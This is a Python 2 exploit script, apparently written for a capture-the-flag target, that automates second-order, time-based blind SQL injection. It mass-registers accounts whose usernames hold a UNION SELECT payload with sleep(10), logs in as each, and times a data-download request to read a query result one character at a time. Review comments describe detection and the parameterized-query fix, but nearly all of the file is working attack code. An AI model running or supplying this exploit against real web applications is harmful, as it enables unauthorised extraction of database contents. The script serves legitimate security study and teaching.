import requests
import sys
import hashlib
import urllib
import os
import random
import string
import time
def randomString(stringLength=8):
    """Return ``stringLength`` lowercase ASCII letters drawn with ``random``.

    Only used below to build a throwaway e-mail local part for signup, so a
    non-cryptographic generator is adequate here.
    """
    alphabet = string.ascii_lowercase
    picked = []
    for _ in range(stringLength):
        picked.append(random.choice(alphabet))
    return ''.join(picked)
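# Proxy map in the shape ``requests`` expects (scheme -> proxy address), for
# routing traffic through a local intercepting proxy on 127.0.0.1:8080.
# The original literal repeated the key 'http', so the second entry was
# silently dropped (duplicate dict key); it is spelled 'https' here.
# Nothing in this file passes ``proxies=`` to a requests call, so the
# mapping is defined but currently unused.
proxies = {'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'}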
def register(ip,inj_str): # Getting registered
    """Create one account per candidate character value.

    ``inj_str`` must contain the literal ``[CHAR]``; for every j in 32..125
    the placeholder is replaced by the decimal string of j and the result is
    submitted as the username in a POST to ``http://<ip>//signup.php``. The
    e-mail is a random local part at ``tester.com`` and both password fields
    are the constant ``'password'`` (``login`` relies on that value).

    Returns True unconditionally: the response bodies are read but never
    inspected, so a rejected or rate-limited signup is not detected here.
    """
    for j in range(32, 126):  # 94 signups per call, one per candidate ASCII code; 126 itself is excluded
        target = "http://%s//signup.php" % (ip)  # doubled slash kept as written
        password = 'password'
        username = '%s' % (inj_str.replace("[CHAR]", str(j)))
        data = {
            "username" : username,
            "email" : randomString()+"@tester.com",
            "password" : password,
            "password1" : password,
            "SignUp": "SignUp"
        }
        r = requests.post(target, data=data, allow_redirects=True)
        res = r.text  # unused: the signup response is never checked
    # NOTE(review): from the application's side this is a burst of ~94 signups
    # from one client whose usernames carry SQL tokens (see inject()); signup
    # rate limiting and server-side username validation would surface it, and
    # parameterized queries wherever the stored username is later used would
    # neutralise it.
    return True
def login(ip, inj_str): # Logging in
    """Report which candidate character value triggers the timing oracle.

    For every j in 32..125 the ``[CHAR]`` placeholder in ``inj_str`` is
    replaced by str(j) and used as the username in a POST to
    ``http://<ip>/index.php`` with the password ``register`` set. When the
    response body contains ``'Followers'`` the login is treated as successful
    and ``/user/settings.php?download=Download+Data`` is fetched in the same
    session; if that request takes longer than 10 seconds, j is returned.

    Returns the int j whose download request was slow, or False when no
    candidate was. The 20 s ``timeout`` on the download request is not
    caught, so a ``requests`` timeout exception propagates to the caller.
    """
    for j in range(32, 126):
        target = "http://%s/index.php" % (ip)
        password = 'password'
        username = '%s' % (inj_str.replace("[CHAR]", str(j)))
        data = {
            "username" : username,
            "password" : password,
            "login" : password  # submit field; it is given the password string as its value
        }
        s = requests.Session()  # fresh cookie jar for each candidate login
        r = s.post(target, data=data)
        res = r.text
        #status_code = r.status_code
        if 'Followers' in res:  # presence of this marker is taken as "logged in"
            # open log files
            target = "http://%s//user/settings.php?download=Download+Data" % (ip)
            data = {
                "download" : "Download Data",
            }  # built but never sent: s.get() below is given no params; the query string already carries it
            response = s.get(target,timeout=20.00)
            time = response.elapsed.total_seconds()  # shadows the imported ``time`` module inside this function
            if(time > 10 ):  # the payload in inject() calls sleep(10) on a match, so a slow answer means the guess was right
                return j
    # NOTE(review): the signal is purely response latency. On the server side
    # the fix is a parameterized query at the point where the stored username
    # is used; as a detection signal, one client producing many logins each
    # followed by a ~10 s download request is distinctive.
    return False
def inject(r, inj, ip):
    """Recover the result of SQL expression ``inj`` one character at a time.

    For each position k in 1..r-1 a time-based blind payload is built around
    ``inj`` that makes the database ``sleep(10)`` when the ASCII code of the
    k-th result character equals ``[CHAR]``; ``register`` stores one username
    per candidate value and ``login`` reports which candidate produced the
    delay. Extraction stops at the first position with no match (``login``
    returned False).

    Returns the extracted string. ``range(1, r)`` excludes r, so at most
    r - 1 characters are read, and only characters in ASCII 32..125 (the
    candidate range in ``register``/``login``) can ever be matched.
    """
    extracted = ""
    for k in range(1, r):
        # ``/**/`` is used in place of spaces throughout the payload; main() applies the same substitution to the query
        injection_string = "'/**/union/**/select/**/(case/**/when/**/(ascii(substring((%s),%s,1))=[CHAR])/**/then/**/sleep(10)/**/else/**/null/**/end),2,3,4,5,6,7,8,9/**/#" % (inj, k)
        register(ip,injection_string)  # return value (always True) is ignored
        retrieved_value = login(ip, injection_string)
        if(retrieved_value):
            extracted += chr(retrieved_value)
            extracted_char = chr(retrieved_value)
            sys.stdout.write(extracted_char)  # stream each character as soon as it is recovered
            sys.stdout.flush()
        else:
            print "\n(+) done!"  # Python 2 print statement
            break
    # NOTE(review): the payload is stored at signup and only takes effect in a
    # later request (second-order injection), so validating input at signup
    # alone does not close it; the query that later consumes the stored value
    # needs parameterization.
    return extracted
def main():
    """Command-line entry point: one argument, the SQL expression to read.

    Spaces in the argument are rewritten to ``/**/`` to match the payload
    style in ``inject``, and positions 1..39 of the result are recovered
    (``inject(40, ...)``). The target host is hard-coded to ``localhost``.
    This function uses Python 2 print statements, so the module does not run
    under Python 3 as written.
    """
    if len(sys.argv) != 2:
        print "(+) usage: %s " % sys.argv[0]  # the usage text does not name the required query argument
        print '(+) eg: %s ' %sys.argv[0]
        sys.exit(-1)
    ip = "localhost"  # not configurable from the command line
    query = sys.argv[1]
    print "(+) Retrieving...."
    #query = "select/**/your_flag/**/from/**/flag"
    query = query.replace(" ", "/**/")  # same comment-for-space substitution inject() uses in its payload
    Flag = inject(40, query, ip)  # range(1, 40) inside inject: at most 39 characters
    print Flag
if __name__ == "__main__":  # run only when executed as a script, not on import
    main()